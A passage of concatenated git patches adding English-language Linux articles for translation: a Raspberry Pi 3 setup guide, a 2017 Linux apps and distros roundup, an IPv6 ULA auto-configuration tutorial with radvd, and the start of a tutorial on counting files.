+`rsync -avzP /path_of_NOOBS/ /path_of_sdcard/`
+
+Make sure to select the root directory of the sd card. In my case (on MacOS), it was:
+
+`rsync -avzP /Users/swapnil/Downloads/NOOBS_v2_2_0/ /Volumes/U/`
+
+Or you can copy and paste the content. Just make sure that all the files inside the NOOBS directory are copied into the root directory of the Micro SD Card and not inside any sub-directory.
+
+Now plug the Micro SD Card into the Raspberry Pi 3, and connect the monitor, the keyboard and the power supply. If you have a wired network available, I recommend using it, as you will get faster download speeds for downloading and installing the base operating system. The device will boot into NOOBS, which offers a couple of distributions to install. Choose Raspbian from the first option and follow the on-screen instructions.
+
+![raspi config][6] Swapnil Bhartiya
+
+Once the installation is complete, the Pi will reboot, and you will be greeted with Raspbian. Now it's time to configure it and run system updates. In most cases, we use the Raspberry Pi in headless mode and manage it remotely over the network using SSH, which means you don't have to plug in a monitor or keyboard to manage your Pi.
+
+First of all, we need to configure the network if you are using Wi-Fi. Click on the network icon on the top panel, select your network from the list, and provide its password.
+
+![wireless][7] Swapnil Bhartiya
+
+Congrats, you are connected wirelessly. Before we proceed with the next step, we need to find the IP address of the device so we can manage it remotely.
+
+Open Terminal and run this command:
+
+`ifconfig`
+
+Now, note down the IP address of the device in the wlan0 section. It should be listed as "inet addr."
+
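+If `ifconfig` isn't available on your image, the `ip` command from iproute2 shows the same information:
+```
+$ ip addr show wlan0
+```
+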
+Now it's time to enable SSH and configure the system. Open the terminal on Pi and open raspi-config tool.
+
+`sudo raspi-config`
+
+The default user and password for Raspberry Pi are "pi" and "raspberry", respectively. You'll need the password for the above command. The first option of the raspi-config tool is to change the default password, and I strongly recommend changing it, especially if you want to use the Pi over the network.
+
+The second option is to change the hostname, which can be useful if you have more than one Pi on the network. A hostname makes it easier to identify each device on the network.
+
+Then go to Interfacing Options and enable Camera, SSH, and VNC. If you're using the device for an application that involves multimedia, such as a home theater system or PC, then you may also want to change the audio output option. By default the output is set to HDMI, but if you're using external speakers, you need to change the setup. Go to the Advanced Options tab of the raspi-config tool and select Audio. There, choose 3.5mm as the default output.
+
+[Tip: Use arrow keys to navigate and then Enter key to choose. ]
+
+Once all these changes are applied, the Pi will reboot. You can unplug the monitor and keyboard from your Pi as we will be managing it over the network. Now open a terminal on your local machine. If you're on Windows, you can use PuTTY or read my article to install Ubuntu Bash on Windows 10.
+
+Then ssh into your system:
+
+`ssh pi@IP_ADDRESS_OF_Pi`
+
+In my case it was:
+
+`ssh pi@10.0.0.161`
+
+Provide the password and, eureka, you are logged into your Pi and can now manage the device from a remote machine. If you want to manage your Raspberry Pi over the Internet, read my article on [enabling RealVNC on your machine][8].
+
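+Once you're logged in, this is also a good time to run the system updates mentioned earlier; on Raspbian that's the usual apt routine:
+```
+$ sudo apt-get update
+$ sudo apt-get upgrade
+```
+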
+In the next follow-up article, I will talk about using Raspberry Pi to manage your 3D printer remotely.
+
+**This article is published as part of the IDG Contributor Network.[Want to Join?][9]**
+
+--------------------------------------------------------------------------------
+
+via: https://www.infoworld.com/article/3176488/linux/a-beginner-s-guide-to-raspberry-pi-3.html
+
+作者:[Swapnil Bhartiya][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.infoworld.com/author/Swapnil-Bhartiya/
+[1]:https://www.raspberrypi.org/downloads/noobs/
+[2]:http://idgenterprise.selz.com
+[3]:https://images.techhive.com/images/article/2017/03/content-100711633-large.jpg
+[4]:https://images.techhive.com/images/article/2017/03/format-100711635-large.jpg
+[5]:http://www.cio.com/article/3176034/linux/how-to-format-an-sd-card-in-linux.html
+[6]:https://images.techhive.com/images/article/2017/03/raspi-config-100711634-large.jpg
+[7]:https://images.techhive.com/images/article/2017/03/wireless-100711636-large.jpeg
+[8]:http://www.infoworld.com/article/3171682/internet-of-things/how-to-access-your-raspberry-pi-remotely-over-the-internet.html
+[9]:https://www.infoworld.com/contributor-network/signup.html
From 6e6e17d00f9f00fcde752e9129b47b8f5f2226b8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:46:31 +0800
Subject: [PATCH 098/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Best=20Linu?=
=?UTF-8?q?x=20Apps=20&=20Distros=20of=202017?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...4 The Best Linux Apps - Distros of 2017.md | 290 ++++++++++++++++++
1 file changed, 290 insertions(+)
create mode 100644 sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
diff --git a/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
new file mode 100644
index 0000000000..1491ff1157
--- /dev/null
+++ b/sources/tech/20171214 The Best Linux Apps - Distros of 2017.md
@@ -0,0 +1,290 @@
+The Best Linux Apps & Distros of 2017
+======
+[![best linux distros 2017][1]][2]
+
+**In this post we look back at the best Linux distro and app releases that helped define 2017.**
+
+'2017 was a fantastic year for Ubuntu and for Linux in general. I can't wait to see what comes next'
+
+And boy were there a lot of 'em!
+
+So join us (ideally with a warm glass of something non-offensive and sweet) as we take a tart look backwards through some key releases from the past 12 months.
+
+This list is not presented in any sort of order, and all of the entries were sourced from **YOUR** feedback to the survey we shared earlier in the week. If your favourite release didn't make the list, it's because not enough people voted for it!
+
+Regardless of your opinions on the apps and Linux distros that are highlighted, I'm sure you'll agree that 2017 was a great year for Linux as a platform and for Linux users.
+
+But enough waffle: on we go!
+
+## Distros
+
+### 1\. Ubuntu 17.10 'Artful Aardvark'
+
+[![Ubuntu 17.10 desktop screenshot][3]][4]
+
+There's no doubt about it: Ubuntu 17.10 was the year's **biggest** Linux release -- by a clear margin.
+
+'Ubuntu 17.10 was the year's biggest Linux distro release'
+
+Canonical [dropped a bombshell in April][5] when it announced it was abandoning its home-grown Unity desktop and jettisoning its (poorly received) mobile ambitions. Most of us were shocked, and few would've been surprised had the distro maker opted to take some time out to figure out what to do next.
+
+But that… that's just not the Ubuntu way.
+
+Canonical dived right into developing Ubuntu 17.10 'Artful Aardvark', healing some long held divisions in the process.
+
+Part reset, part gamble; the Artful Aardvark had the arduous task of replacing the bespoke (patched, forked) Unity desktop with upstream GNOME Shell. It also [opted to make the switch][6] to the new-fangled [Wayland display server protocol][7] by default, too.
+
+Amazingly, thanks to a mix of grit and goodwill, it succeeded. The [Ubuntu 17.10 release][8] emerged on time on October 19, 2017, where it was greeted by warm reviews and a sense of relief!
+
+The recurring theme among the [Ubuntu 17.10 reviews][9] was that the Artful Aardvark was a real **return to form** for the distro. It got people excited about Ubuntu for the first time in a long time.
+
+And with a long-term support release up next, long may the enthusiasm for it continue!
+
+### 2\. Solus 3
+
+[![][10]][11]
+
+We knew 2017 was going to be a big year for the Solus Linux distro, which is why it made our list of [Linux distros we were most excited for][12] this year.
+
+'Solus is fast becoming the Linux aficionados' main alternative to Arch'
+
+Solus is a unique distro in that it's not based on another. It uses its home-grown Budgie desktop by default, has its own package manager (eopkg) and update procedure, and sets its own criteria for app curation. Solus also backs Canonical's Flatpak rival, Snappy.
+
+The [release of Solus 3][13] in the summer was a particular highlight for this upstart distro. The update packs in improvements across the board, touching on everything from kernel security through to multimedia upgrades.
+
+Solus 3 also arrived with [Budgie 10.4][14]. A massive upgrade to this GTK-based desktop environment, Budgie 10.4 brings (among other things) greater customisation, a new Settings app, multiple new panel options, applets and transparency, and an improved Raven sidebar.
+
+Fast becoming the Linux aficionados' main alternative to Arch Linux, Solus is a Linux distro that's going places.
+
+If you like the look of Budgie you can use it on Ubuntu without damaging your existing desktop. See our [how to install Budgie 10.4 on Ubuntu][14] article for all the necessary details.
+
+If you get bored over the holidays, I highly recommend you [download the Solus MATE edition][15] too. It combines the strength of Solus with the meticulously maintained MATE desktop, a combination that works incredibly well together.
+
+### 3\. Fedora 27
+
+[![][16]][17]
+
+We're not oblivious to what happens beyond the orange bubble, and the release of [Fedora 27 Workstation][18] marked another fine update from the folks who like to wear red hats.
+
+Fedora 27 features GNOME 3.26 (and all the niceties that brings, like color emoji support, folder sharing in Boxes, and so on), ships with LibreOffice 5.4, and "simplifies container storage, delivers containerized services by default" using Red Hat's no-cost RHEL Developer subscriptions.
+
+[Redhat Press Release for Fedora 27][19]
+
+## Apps
+
+### 4\. Firefox 57 (aka 'Firefox Quantum').
+
+[![firefox quantum on ubuntu][20]][21]
+
+Ubuntu wasn't the only open-source project to undergo something of a 'renewal' this year.
+
+'Like Ubuntu, Firefox finally got its mojo back this year'
+
+After years of slow decline and feature creep, Mozilla finally did something about Firefox losing ground to Google Chrome.
+
+Firefox 57 is such a big release that it even has its own name: Firefox Quantum. And the release truly is a quantum leap in performance and responsiveness. The browser is now speedier than Chrome, makes intelligent use of multi-threaded processes, and has a sleek new look that feels right.
+
+Like Ubuntu, Firefox has got its mojo back.
+
+Firefox will roll out support for client side decoration on the GNOME desktop (a feature already available in the latest nightly builds) sometime in 2018. This feature, along with further refinements to the finely-tuned under-the-hood mechanics, will add more icing atop an already fantastic base!
+
+### 5\. Ubuntu for Windows
+
+[![][22]][23]
+
+Yes, I know: it's a little bit odd to list a Windows release in a run-down of Linux releases -- but there is a logic to it!
+
+Ubuntu on the Windows Store is an admission writ large that Linux is an integral part of the modern software development ecosystem
+
+The arrival of [Ubuntu on the Windows Store][24] (along with other Linux distributions) in July was a pretty bizarre sight to see.
+
+Few could've imagined Microsoft would ever accede to Linux in such a visible manner. Remember: it didn't sneak Linux distros in through the back door, it went out and boasted about it!
+
+Some (perhaps rightly) remain uneasy and/or somewhat suspicious over Microsoft's sudden embrace of 'all things open source'. Me? I'm less concerned. Microsoft isn't the hulking great giant it once was, and Linux has become so ubiquitous that the Redmond-based company simply can't ignore it.
+
+The stocking of Ubuntu, openSUSE and Fedora on the shelves of the Windows Store (albeit for developers) is an admission writ large that Linux is an integral part of the modern software development ecosystem, and one they simply can't replicate, replace or rip-off.
+
+For many, regular Linux will always be preferable to the rather odd hybrid that is the Windows Subsystem for Linux (WSL). But for others, mandated to use Microsoft products for work or study, the leeway to use Linux is a blessing.
+
+### 6\. GIMP 2.9.6
+
+[![gimp on ubuntu graphic][25]][26]
+
+We've written a fair bit about GIMP this year. The famous image editor has benefited from a spurt of development activity. We started the year off by talking about the [features in GIMP 2.10][27] we were expecting to see.
+
+While GIMP 2.10 itself didn't see release in 2017, two sizeable development updates did: GIMP 2.9.6 and GIMP 2.9.8.
+
+The former of these added **experimental multi-threading in GEGL** (a fancy way of saying the app can now make better use of multi-core processors). It also added HiDPI tweaks, introduced color-coded layer tags, added a metadata editor, new filters and crop presets, and -- take a breath -- improved the 'quit' dialog.
+
+### 7\. GNOME Desktop
+
+[![GNOME 3.26 desktop with apps][28]][29]
+
+While not strictly an app or a distro release, there were two GNOME releases in 2017: the feature-filled [GNOME 3.24 release][30] in March, and the iterative follow-up [GNOME 3.26][31] in September.
+
+Both releases came packed full of new features, and both brought an assembly of refinements, improvements and adjustments.
+
+**GNOME 3.24** features included Night Light, a blue-light filter that can help improve natural sleeping patterns; a new desktop Recipes app; and short weather forecast snippets in the Message Tray.
+
+**GNOME 3.26** built on the preceding release. It improved the look, feel and responsiveness of the GNOME Shell UI; revamped the Settings app with a new layout and access to more options; integrated Firefox Sync support with the Web browser app; and tweaked the window animation effects (a bit of a trend this year) to create a more fluid-feeling desktop.
+
+GNOME isn't stopping there. GNOME 3.28 is due for release in March with plenty more changes, improvements and app updates planned. GNOME 3.28 is looking like it will be used in Ubuntu 18.04 LTS.
+
+### 8\. Atom IDE
+
+[![Atom IDE][32]][32]
+
+This year was ripe with code editors, with Sublime Text 3, Visual Studio Code, Atom, Adobe Brackets, Gedit and many others releasing updates.
+
+But, for me, it was the rather sudden appearance of **Atom IDE** that caught my attention.
+
+[Atom IDE][33] is a set of packages for the Atom code editor that add more traditional [IDE][34] capabilities like context-aware auto-completion, code navigation, diagnostics, and document formatting.
+
+### 9\. Stacer 1.0.8
+
+[![Stacer is an Ubuntu cleaner app][35]][36]
+
+A system cleaner might not sound like the most exciting of tools but **Stacer** makes housekeeping a rather appealing task.
+
+This year the app binned its Electron-built base in favour of a native C++ core, leading to various performance improvements as a result.
+
+Stacer has 8 dedicated sections offering control over system maintenance duties, including:
+
+ * **Monitor system resources including CPU**
+ * **Clear caches, logs, obsolete packages etc**
+ * **Bulk remove apps and packages**
+ * **Add/edit/disable start-up applications**
+
+
+
+The app is now my go-to recommendation for anyone looking for an Ubuntu system cleaner. Which reminds me: I should get around to adding the app to our list of ways to [free up space on Ubuntu][37]… Chores, huh?!
+
+### 10\. Geary 0.12
+
+[![Geary 0.11 on Ubuntu 16.04][38]][39]
+
+The best alternative to Thunderbird on Linux has to be **Geary**, the open-source email app that works brilliantly with Gmail and other webmail accounts.
+
+In October [Geary 0.12 was released][40]. This huge update adds a couple of new features to the app and a bucket-load of improvements to the ones it already boasts.
+
+Among the (many) highlights in the Geary 0.12:
+
+ * **Inline images in the email composer**
+ * **Improved interface when displaying conversations**
+ * **Support message archiving for Yahoo! Mail and Outlook.com**
+ * **Keyboard navigation for conversations**
+
+
+
+Geary 0.12 is available to install on Ubuntu 16.04 LTS and above from the [official Geary PPA][41]. If you're tired of Thunderbird (and the [gorgeous Montrail theme][42] doesn't make it more palatable) I recommend giving Geary a go.
+
+## Other Odds & Ends
+
+I said at the outset that it had been a busy year -- and it really has been. Writing a post like this is always a thankless task. So many app, script, theme, and distribution releases happen throughout the year, the majority bringing plenty to the table. I don't want to miss anyone or anything out -- but I must if I ever want to hit publish!
+
+### Flathub
+
+[![flathub screenshot][43]][44]
+
+All this talk of apps means I have to mention the launch of [Flathub][45] this year.
+
+Flathub is the de facto [Flatpak][46] app store; a centralised repository where the latest versions of your favourite apps live.
+
+Flatpak really needed something like **Flathub**, and so did users. Now it's really easy to install the latest release of a slate of apps on pretty much any Linux distribution, without having to stress about package dependencies or conflicts.
+
+Among the apps you can install from Flathub:
+
+ * **Corebird**
+ * **Spotify**
+ * **SuperTuxKart**
+ * **VLC**
+ * **Discord**
+
+
+ * **Telegram Desktop**
+ * **Atom**
+ * **GIMP**
+ * **Geary**
+ * **Skype**
+
+
+
+And the list is still growing!
+
+### And! And! And!
+
+Other apps we loved this year include [continued improvements][47] to the **Corebird** Twitter client, some [useful new options][48] in the animated GIF maker **Peek**, as well as the arrival of the Nylas Mail fork **Mailspring** and the promising GTK audiobook player **Cozy**.
+
+**Skype** brought a [bold new look][49] to VoIP fans on Linux desktops, **LibreOffice** (as always) served up continued improvements, and **Signal** launched a [dedicated desktop app][50].
+
+A big **CrossOver** update means you can now [run Microsoft Office 2016 on Linux][51]; and we got a handy wizard that makes it easy to [install Adobe Creative Cloud on Linux][52].
+
+**What was your favourite Linux related release of 2017? Let us know in the comments!**
+
+Wondering where the games are? Don't panic! We cover the best Linux games of 2017 in a separate post, which we'll publish tomorrow.
+
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.omgubuntu.co.uk/2017/12/list-best-linux-distros-apps-2017
+
+作者:[Joey Sneddon][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://plus.google.com/117485690627814051450/?rel=author
+[1]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/best-linux-distros-2017-750x421.jpg
+[2]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/best-linux-distros-2017.jpg
+[3]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/10/ubuntu-17.10-desktop.jpg (Ubuntu 17.10 desktop screenshot)
+[4]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/10/ubuntu-17.10-desktop.jpg
+[5]:http://www.omgubuntu.co.uk/2017/04/ubuntu-18-04-ship-gnome-desktop-not-unity
+[6]:http://www.omgubuntu.co.uk/2017/08/ubuntu-confirm-wayland-default-17-10
+[7]:https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)
+[8]:http://www.omgubuntu.co.uk/2017/10/ubuntu-17-10-release-features
+[9]:http://www.omgubuntu.co.uk/2017/10/ubuntu-17-10-review-roundup
+[10]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/Budgie-750x422.jpg
+[11]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/Budgie.jpg
+[12]:http://www.omgubuntu.co.uk/2016/12/6-linux-distributions-2017
+[13]:https://solus-project.com/2017/08/15/solus-3-released/
+[14]:http://www.omgubuntu.co.uk/2017/08/install-budgie-desktop-10-4-on-ubuntu
+[15]:https://soluslond1iso.stroblindustries.com/Solus-3-MATE.iso
+[16]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-csd-fedora-from-reddit-750x415.png
+[17]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-csd-fedora-from-reddit.png
+[18]:https://fedoramagazine.org/whats-new-fedora-27-workstation/
+[19]:https://www.redhat.com/en/about/press-releases/fedora-27-now-generally-available (Redhat Press Release )
+[20]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-quantum-ubuntu-screenshot-750x448.jpg (Firefox 57 screenshot on Linux)
+[21]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/firefox-quantum-ubuntu-screenshot.jpg
+[22]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/07/windows-facebook-750x394.jpg
+[23]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/07/windows-facebook.jpg
+[24]:http://www.omgubuntu.co.uk/2017/07/ubuntu-now-available-windows-store
+[25]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/01/gimp-750x422.jpg
+[26]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/01/gimp.jpg
+[27]:http://www.omgubuntu.co.uk/2017/01/plans-for-gimp-2-10
+[28]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/GNOME-326-apps-750x469.jpg
+[29]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/GNOME-326-apps.jpg
+[30]:http://www.omgubuntu.co.uk/2017/03/gnome-3-24-released-new-features
+[31]:http://www.omgubuntu.co.uk/2017/09/gnome-3-26-officially-released
+[32]:https://i.imgur.com/V9DTnL3.jpg
+[33]:http://blog.atom.io/2017/09/12/announcing-atom-ide.html
+[34]:https://en.wikipedia.org/wiki/Integrated_development_environment
+[35]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/08/stacer-ubuntu-cleaner-app-350x200.jpg
+[36]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/08/stacer-ubuntu-cleaner-app.jpg
+[37]:http://www.omgubuntu.co.uk/2016/08/5-ways-free-up-space-on-ubuntu
+[38]:http://www.omgubuntu.co.uk/wp-content/uploads/2016/05/geary-11-1-350x200.jpg
+[39]:http://www.omgubuntu.co.uk/wp-content/uploads/2016/05/geary-11-1.jpg
+[40]:http://www.omgubuntu.co.uk/2017/10/install-geary-0-12-on-ubuntu
+[41]:https://launchpad.net/~geary-team/+archive/ubuntu/releases
+[42]:http://www.omgubuntu.co.uk/2017/04/a-modern-thunderbird-theme-font
+[43]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/flathub-apps-750x345.jpg
+[44]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/09/flathub-apps.jpg
+[45]:http://www.flathub.org/
+[46]:https://en.wikipedia.org/wiki/Flatpak
+[47]:http://www.omgubuntu.co.uk/2017/10/gtk-twitter-app-corebird-pushed-new-release
+[48]:http://www.omgubuntu.co.uk/2017/11/linux-release-roundup-peek-gthumb-more
+[49]:http://www.omgubuntu.co.uk/2017/10/new-look-skype-for-desktop-released
+[50]:http://www.omgubuntu.co.uk/2017/11/signal-desktop-app-released
+[51]:http://www.omgubuntu.co.uk/2017/12/crossover-17-linux
+[52]:http://www.omgubuntu.co.uk/2017/10/install-adobe-creative-cloud-linux
From 5abb273bdd49b3b91a8434a287977a02a3f38de8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:48:13 +0800
Subject: [PATCH 099/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20IPv6=20Auto-Confi?=
=?UTF-8?q?guration=20in=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...171214 IPv6 Auto-Configuration in Linux.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
diff --git a/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
new file mode 100644
index 0000000000..85108d8b6f
--- /dev/null
+++ b/sources/tech/20171214 IPv6 Auto-Configuration in Linux.md
@@ -0,0 +1,109 @@
+IPv6 Auto-Configuration in Linux
+======
+
+
+In [Testing IPv6 Networking in KVM: Part 1][1], we learned about unique local addresses (ULAs). In this article, we will learn how to set up automatic IP address configuration for ULAs.
+
+### When to Use Unique Local Addresses
+
+Unique local addresses use the fd00::/8 address block, and are similar to our old friends the IPv4 private address classes: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. But they are not intended as a direct replacement. IPv4 private address classes and network address translation (NAT) were created to alleviate the shortage of IPv4 addresses, a clever hack that prolonged the life of IPv4 for years after it should have been replaced. IPv6 supports NAT, but I can't think of a good reason to use it. IPv6 isn't just bigger IPv4; it is different and needs different thinking.
+
+So what's the point of ULAs, especially when we have link-local addresses (fe80::/10) and don't even need to configure them? There are two important differences. One, link-local addresses are not routable, so you can't cross subnets. Two, you control ULAs; choose your own addresses, make subnets, and they are routable.
+
+Another benefit of ULAs is you don't need an allocation of global unicast IPv6 addresses just for mucking around on your LAN. If you have an allocation from a service provider then you don't need ULAs. You can mix global unicast addresses and ULAs on the same network, but I can't think of a good reason to have both, and for darned sure you don't want to use network address translation (NAT) to make ULAs publicly accessible. That, in my peerless opinion, is daft.
+
+ULAs are for private networks only and should be blocked from leaving your network, and not allowed to roam the Internet. Which should be simple, just block the whole fd00::/8 range on your border devices.
+
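+As a sketch of such a border rule (assuming an ip6tables firewall and that `eth0` is the interface facing the Internet), it could be as simple as:
+```
+$ sudo ip6tables -A FORWARD -o eth0 -s fd00::/8 -j DROP
+$ sudo ip6tables -A FORWARD -i eth0 -d fd00::/8 -j DROP
+```
+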
+### Address Auto-Configuration
+
+ULAs are not automatic like link-local addresses, but setting up auto-configuration is easy as pie with radvd, the router advertisement daemon. Before you change anything, run `ifconfig` or `ip addr show` to see your existing IP addresses.
+
+You should install radvd on a dedicated router for production use, but for testing you can install it on any Linux PC on your network. In my little KVM test lab, I installed it on Ubuntu, `apt-get install radvd`. It should not start after installation, because there is no configuration file:
+```
+$ sudo systemctl status radvd
+● radvd.service - LSB: Router Advertising Daemon
+ Loaded: loaded (/etc/init.d/radvd; bad; vendor preset: enabled)
+ Active: active (exited) since Mon 2017-12-11 20:08:25 PST; 4min 59s ago
+ Docs: man:systemd-sysv-generator(8)
+
+Dec 11 20:08:25 ubunut1 systemd[1]: Starting LSB: Router Advertising Daemon...
+Dec 11 20:08:25 ubunut1 radvd[3541]: Starting radvd:
+Dec 11 20:08:25 ubunut1 radvd[3541]: * /etc/radvd.conf does not exist or is empty.
+Dec 11 20:08:25 ubunut1 radvd[3541]: * See /usr/share/doc/radvd/README.Debian
+Dec 11 20:08:25 ubunut1 radvd[3541]: * radvd will *not* be started.
+Dec 11 20:08:25 ubunut1 systemd[1]: Started LSB: Router Advertising Daemon.
+
+```
+
+It's a little confusing with all the start and not-started messages, but radvd is not running, which you can verify with good old `ps ax|grep radvd`. So we need to create `/etc/radvd.conf`. Copy this example, replacing the network interface name on the first line with your interface name:
+```
+interface ens7 {
+ AdvSendAdvert on;
+ MinRtrAdvInterval 3;
+ MaxRtrAdvInterval 10;
+ prefix fd7d:844d:3e17:f3ae::/64
+ {
+ AdvOnLink on;
+ AdvAutonomous on;
+ };
+
+};
+
+```
+
+The prefix defines your network address, which is the first 64 bits of the address. The first two characters must be `fd`, the next 40 bits are your random global ID, and the 16 bits after that define the subnet; leave the last 64 bits empty, as radvd will assign those host bits. Your subnet size must always be /64. RFC 4193 requires that addresses be randomly generated; see [Testing IPv6 Networking in KVM: Part 1][1] for more information on creating and managing ULAs.
+
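+To make that structure concrete, here is how the example prefix above breaks down under RFC 4193 (using the same value as in the radvd.conf sketch):
+```
+# fd7d:844d:3e17:f3ae::/64
+#   fd           -> ULA prefix (fd00::/8, locally assigned)
+#   7d:844d:3e17 -> 40-bit random global ID
+#   f3ae         -> 16-bit subnet ID
+#   ::           -> last 64 bits, the interface ID, filled in by radvd/SLAAC
+```
+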
+### IPv6 Forwarding
+
+IPv6 forwarding must be enabled. This command enables it until restart:
+```
+$ sudo sysctl -w net.ipv6.conf.all.forwarding=1
+
+```
+
+Uncomment or add this line to `/etc/sysctl.conf` to make it permanent:
+```
+net.ipv6.conf.all.forwarding = 1
+```
+
+Start the radvd daemon:
+```
+$ sudo systemctl stop radvd
+$ sudo systemctl start radvd
+
+```
+
+This example reflects a quirk I ran into on my Ubuntu test system; I always have to stop radvd, no matter what state it is in, and then start it to apply any changes.
+
+You won't see any output on a successful start, and often not on a failure either, so run `sudo systemctl status radvd`. If there are errors, systemctl will tell you. The most common errors are syntax errors in `/etc/radvd.conf`.
+
+A cool thing I learned after complaining on Twitter: when you run `journalctl -xe --no-pager` to debug systemctl errors, your output lines will wrap, and then you can actually read your error messages.
+
+Now check your hosts to see their new auto-assigned addresses:
+```
+$ ifconfig
+ens7 Link encap:Ethernet HWaddr 52:54:00:57:71:50
+ [...]
+ inet6 addr: fd7d:844d:3e17:f3ae:9808:98d5:bea9:14d9/64 Scope:Global
+ [...]
+
+```
+
+And there it is! Come back next week to learn how to manage DNS for ULAs, so you can use proper hostnames instead of those giant IPv6 addresses.
+
+Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2017/12/ipv6-auto-configuration-linux
+
+作者:[Carla Schroder][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/cschroder
+[1]:https://www.linux.com/learn/intro-to-linux/2017/11/testing-ipv6-networking-kvm-part-1
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 3521f0c6518ba7b5fda217da4425c9cc15b4a2b0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:50:28 +0800
Subject: [PATCH 100/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Count?=
=?UTF-8?q?=20The=20Number=20Of=20Files=20And=20Folders/Directories=20In?=
=?UTF-8?q?=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Files And Folders-Directories In Linux.md | 179 ++++++++++++++++++
1 file changed, 179 insertions(+)
create mode 100644 sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
diff --git a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
new file mode 100644
index 0000000000..b3cc45af13
--- /dev/null
+++ b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
@@ -0,0 +1,179 @@
+How To Count The Number Of Files And Folders/Directories In Linux
+======
+Hi folks, today we have come up with a set of handy commands that will help you in many ways. These commands let you count the files and directories in the current directory, count them recursively, list files created by a particular user, and so on.
+
+In this tutorial, we are going to show you how to combine several commands, such as ls, egrep, wc and find, to perform some more advanced counting tasks. The set of commands below will help you in many situations.
+
+To experiment with this, I'm going to create a total of 7 files and 2 folders (5 regular files and 2 hidden files). See the tree command output below, which clearly shows the list of files and folders.
+
+**Suggested Read :** [File Manipulation Commands][1]
+```
+# tree -a /opt
+/opt
+├── magi
+│ └── 2g
+│ ├── test5.txt
+│ └── .test6.txt
+├── test1.txt
+├── test2.txt
+├── test3.txt
+├── .test4.txt
+└── test.txt
+
+2 directories, 7 files
+
+```
+
+**Example-1 :** To count files in the current directory (excluding hidden files). Run the following command to determine how many files there are in the current directory; it doesn't count dotfiles.
+```
+# ls -l . | egrep -c '^-'
+4
+
+```
+
+**Details :**
+
+ * `ls` : list directory contents
+ * `-l` : Use a long listing format
+ * `.` : List information about the FILEs (the current directory by default).
+ * `|` : control operator that sends the output of one program to another program for further processing.
+ * `egrep` : print lines matching a pattern
+ * `-c` : print a count of matching lines instead of the lines themselves
+ * `'^-'` : match lines that begin with `-`, i.e. regular files in the long listing
+
+
+
+**Example-2 :** To count files in the current directory, including hidden files. This will count dotfiles as well.
+```
+# ls -la . | egrep -c '^-'
+5
+
+```
+
+**Example-3 :** Run the following command to count files and folders in the current directory. It counts them all together at once.
+```
+# ls -1 | wc -l
+5
+
+```
+
+**Details :**
+
+ * `ls` : list directory contents
+ * `-1` : list one file per line
+ * `|` : control operator that sends the output of one program to another program for further processing.
+ * `wc` : It's a command to print newline, word, and byte counts for each file
+ * `-l` : print the newline counts
+
+
+
+**Example-4 :** To count files and folders in the current directory, including hidden files and directories.
+```
+# ls -1a | wc -l
+8
+
+```
+
+**Example-5 :** To count files in the current directory recursively, including hidden files.
+```
+# find . -type f | wc -l
+7
+
+```
+
+**Details :**
+
+ * `find` : search for files in a directory hierarchy
